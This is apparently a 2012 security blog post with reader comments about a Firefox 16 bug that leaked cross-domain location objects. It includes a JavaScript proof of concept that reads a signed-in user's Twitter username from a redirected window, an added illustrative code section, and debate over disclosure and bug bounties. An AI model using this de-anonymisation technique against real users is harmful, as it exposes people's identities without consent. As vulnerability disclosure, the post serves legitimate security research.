Firefox knows what your friends did last summer
Wednesday, 10 October 2012
Update…
Mozilla have now fixed the problem, on Thursday. Not only did they take down the original release, they fixed it very quickly, within two days, which is very impressive. Good work!
I was writing some JavaScript and found that the following happens:
/undefined/.test(undefined) // true
The undefined value is converted to a string and then the test returns true. It surprised me but wasn't totally unexpected. Then I thought: if a string conversion is being done inside the native function, perhaps we can abuse that? Oh yes we can :) I thought, how about we apply this to a cross-domain (x-domain) protected object, e.g. the location of an external iframe? /businessinfo\.co\.uk/.test(document.getElementById('x').contentWindow.location) worked! But wait, if test works then so could exec, and then we can get the full location from the x-domain object. /(.+)/.exec(loc); also works, since the x-domain object is being converted to a string in the exec function too.
The first thing I thought was that I can use Twitter to identify the user :) but how? /home doesn't return a unique URL, so I was searching through Twitter to see what URLs redirected to a unique URL when I found /lists, which redirects to twitter.com/uid/lists :) perfect.
Here's how the PoC works. You need to be signed into Twitter over https. The PoC then opens a new window to the /lists URL on Twitter, waits 5 seconds, then runs a regex on the x-domain location object to reveal the Twitter username.
function poc() {
    // Open /lists; a signed-in user is redirected to https://twitter.com/<username>/lists
    var win = window.open('https://twitter.com/lists/', 'newWin', 'width=200,height=200');
    // Give the redirect time to complete, then read the x-domain location object
    setTimeout(function(){
        // exec() converts win.location to a string; capture group 1 is the username
        alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1])
    }, 5000);
}
There you have it: Firefox is a little too lax with the location object.
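The mechanism behind the PoC, as an added example that is not part of the original post: RegExp.prototype.test and exec apply ToString to whatever they are given, so passing an object means its toString is invoked, which is the path the PoC takes through the cross-domain location object. The two location stand-ins below are constructed for illustration (a guarded one whose toString throws, matching the "Permission denied" behaviour a browser is supposed to show, and a leaky one that returns its href); the username and URL are made up. The regex escapes the dot in twitter.com, a small tightening of the PoC's pattern.

```javascript
// Added illustration, not the original post's code. Models the ToString coercion
// that RegExp.prototype.test/exec perform on non-string arguments.

// Constructed stand-in for a cross-origin Location object in a browser that enforces
// the same-origin check: stringifying it throws, so any implicit conversion fails.
function makeGuardedLocation(href) {
  return {
    toString() {
      throw new Error('Permission denied to call method Location.toString');
    },
  };
}

// Constructed stand-in for the leaky behaviour: stringification returns the full href.
function makeLeakyLocation(href) {
  return { toString() { return href; } };
}

// Counts how many times a probe object's toString runs when passed to test(), exec()
// and String(): each of the three coerces its argument with ToString.
function countToStringCalls() {
  let calls = 0;
  const probe = { toString() { calls++; return 'probe'; } };
  /probe/.test(probe);   // ToString(probe) -> 'probe'
  /(.+)/.exec(probe);    // same coercion
  String(probe);         // explicit conversion takes the same path
  return calls;          // 3
}

// The post's first observation: undefined is coerced to the string 'undefined'.
function undefinedMatches() {
  return /undefined/.test(undefined);
}

// The post's wildcard trick: /(.+)/.exec(obj) returns the whole stringified object.
// Returns null when the object refuses to be stringified.
function stringifyViaRegex(obj) {
  try {
    const m = /(.+)/.exec(obj);
    return m ? m[1] : null;
  } catch (e) {
    return null;
  }
}

// The PoC's extraction: first path segment of a twitter.com URL, which after the
// /lists redirect is the username. Returns null if the browser blocks the coercion.
const USERNAME_RE = /^https:\/\/twitter\.com\/([^/]+)/;

function extractUsername(locationObj) {
  try {
    const m = USERNAME_RE.exec(locationObj); // exec() calls ToString(locationObj)
    return m ? m[1] : null;
  } catch (e) {
    return null;
  }
}

// Constructed sample: the post-redirect URL for a hypothetical user 'alice'.
const SAMPLE_HREF = 'https://twitter.com/alice/lists';

console.log(countToStringCalls());                                    // 3
console.log(undefinedMatches());                                      // true
console.log(stringifyViaRegex(makeLeakyLocation(SAMPLE_HREF)));       // full URL
console.log(extractUsername(makeLeakyLocation(SAMPLE_HREF)));         // 'alice'
console.log(extractUsername(makeGuardedLocation(SAMPLE_HREF)));       // null
```

The guarded stand-in is the behaviour to expect from a browser: the cross-origin Location object must refuse the toString call, and nothing the caller does with the returned object (regex, String(), alert()) should get past that, which is what comments 1 and 4 point out about the regex not being the essential ingredient.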
No. 1 — October 10th, 2012 at 3:14 pm
It appears alert(document.getElementById('x').contentWindow.location) works too. It seems that it's unrelated to the string conversion and that Firefox is in fact leaking location anyway.
No. 2 — October 10th, 2012 at 3:38 pm
In Firefox 15.0.1, I get this error in the console when I run your PoC:
Error: Permission denied for to call method Location.toString
Which is what you’d normally expect when accessing window.location cross-domain. What version of FF did you test this in?
No. 3 — October 10th, 2012 at 3:39 pm
Firefox 16.0
http://shazzer.co.uk/database/All/is-my-browser-leaking-location?privateKey=
No. 4 — October 10th, 2012 at 3:53 pm
Yeah, I updated to 16 and your PoC – so it’s a recent regression. However just doing alert(win.location) also works, so it looks like the funky regex stuff isn’t actually needed.
No. 5 — October 10th, 2012 at 4:08 pm
Yeah, I realised that after the blog post :) but that was my thinking on how I discovered it.
No. 6 — October 11th, 2012 at 7:32 am
https://blog.mozilla.org/security/2012/10/10/security-vulnerability-in-firefox-16/
Nice one :)
No. 7 — October 11th, 2012 at 9:08 am
Why did you disclose this before Mozilla was able to fix this?
No. 8 — October 11th, 2012 at 11:02 am
LOL @Wess :)
As always, nice one Gareth!
No. 9 — October 11th, 2012 at 11:09 am
>Why did you disclose this before Mozilla was able to fix this?
He missed out on a 3000 USD bug bounty by doing so. (Maybe the publicity was worth it, I don’t know)
No. 10 — October 11th, 2012 at 11:20 am
@Gian-Carlo
I think Mozilla taking FF16 down is reward enough. Publicity LOL. 3K LOL.
No. 11 — October 11th, 2012 at 4:47 pm
>Why did you disclose this before Mozilla was able to fix this?
^Gryf.
>I think Mozilla taking FF16 down is reward enough. Publicity LOL. 3K LOL.
GG OP. :)
No. 12 — October 12th, 2012 at 10:24 am
Getting a bug bounty is unrelated to disclosure. You can submit it to Mozilla *and* do a blog post to get the bug bounty :) They don't buy your silence, they only buy your bug.
No. 13 — October 12th, 2012 at 10:37 am
LOL, I've exploited you all mentally. You cannot understand why I didn't take the cash. You then say it's for publicity LOL because it hurts your logic circuits. Listen, I love bugs; so did everyone else, and now most of you love your bounty.